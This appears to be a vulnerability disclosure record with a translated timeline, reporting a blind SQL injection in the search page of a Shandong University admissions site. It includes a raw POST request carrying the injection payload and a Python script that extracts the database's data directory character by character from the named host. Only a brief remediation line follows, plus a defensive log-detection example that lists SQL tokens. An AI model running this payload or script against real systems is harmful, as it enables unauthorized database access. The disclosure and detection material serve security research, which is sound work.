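2015-12-11: Details reported to the vendor; awaiting vendor response
2015-12-12: Vendor confirmed; details disclosed to the vendor only
2015-12-22: Details disclosed to core white hats and experts in related fields
2016-01-01: Details disclosed to regular white hats
2016-01-11: Details disclosed to intern white hats
2016-01-25: Details disclosed to the public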
An injection vulnerability at Shandong University, with script
POST /search HTTP/1.1
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.bkzs.sdu.edu.cn
Cookie: JSESSIONID=5FE2DD4B830F1A5863F1D7E5B6947DEE;SERVERID=d6b1c6187f7b39e92c6c281a5ffce854|1444727923|1444727923
Host: www.bkzs.sdu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

btn=1&keyword='XOR(if(ascii(mid(@@datadir,1,1))>10,1,0))OR'
The keyword parameter is vulnerable to injection. Script:
#coding=utf-8
import sys,urllib2
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
import urllib

result=''

def request(URL,data):
    #print URL
    user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
    req = urllib2.Request(URL, data, user_agent)
    try:
        request = urllib2.urlopen(req)
    except HTTPError, e:
        if e.code == 500:
            return 'Runtime Error'
    except URLError, e:
        #print('[!] We failed to reach a server.')
        #print('[!] Reason: ' + str(e.reason))
        sys.exit(1)
    return request.read()

def binary_sqli(left, right, index):
    global result
    while 1:
        mid = (left + right)/2
        if (right-left==1):
            result += chr(right)
            print 'datadir: ' ,result
            break
        payload = "'XOR(if(ascii(mid(@@datadir,%s,1))>%s,1,0))OR'" % (index, mid)
        param = {'keyword': payload,'btn':'1'}
        print payload
        html = request('http://www.bkzs.sdu.edu.cn/search',urllib.urlencode(param))
        # print html
        verify = 'datadir'
        if verify not in html:
            left = mid
        else:
            right = mid

if __name__ == '__main__':
    for i in range(1,25):
        binary_sqli(32, 127, i)
Retrieving datadir
Filter the input
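Added example, not part of the original report: a log-side check for the request pattern the script above produces, where the keyword value keeps the same SQL-shaped template and only the index and threshold numbers change between requests. The record format (client address, POST body), the token list, the min_hits threshold and the sample addresses are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlencode

# SQL function calls and MySQL system variables that have no place in a search keyword.
SQL_TOKENS = re.compile(r"(?i)\b(?:ascii|mid|substr(?:ing)?|if|sleep|xor)\s*\(|@@\w+")

def template(value):
    """Collapse digit runs so probes differing only in index/threshold compare equal."""
    return re.sub(r"\d+", "N", value)

def find_blind_sqli(records, param="keyword", min_hits=5):
    """Return {(client, template): count} for repeated SQL-shaped values of `param`."""
    counts = defaultdict(int)
    for client, body in records:
        for value in parse_qs(body, keep_blank_values=True).get(param, []):
            if SQL_TOKENS.search(value):
                counts[(client, template(value))] += 1
    return {key: n for key, n in counts.items() if n >= min_hits}

def build_sample():
    """Constructed log records: (client address, url-encoded POST body)."""
    shape = "'XOR(if(ascii(mid(@@datadir,%d,1))>%d,1,0))OR'"  # payload shape from the report
    probes = [(1, 79), (1, 103), (1, 115), (1, 109), (1, 112), (2, 79), (2, 103)]
    rows = [("198.51.100.7", urlencode({"btn": "1", "keyword": shape % p})) for p in probes]
    # Ordinary searches; the last one trips SQL_TOKENS once but stays under min_hits.
    for kw in ("admissions 2015", "admissions 2016", "what if (x)"):
        rows.append(("203.0.113.20", urlencode({"btn": "1", "keyword": kw})))
    return rows

if __name__ == "__main__":
    for (client, shape), n in find_blind_sqli(build_sample()).items():
        print("%s sent %d probes shaped like %s" % (client, n, shape))
```

Grouping by template rather than by exact value is what makes the binary search visible: each probe is unique as a string, but all of them collapse to one shape per client.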
Severity: High
Vulnerability Rank: 14
Confirmed: 2015-12-12 12:34
The organization responsible for the system has been notified
None yet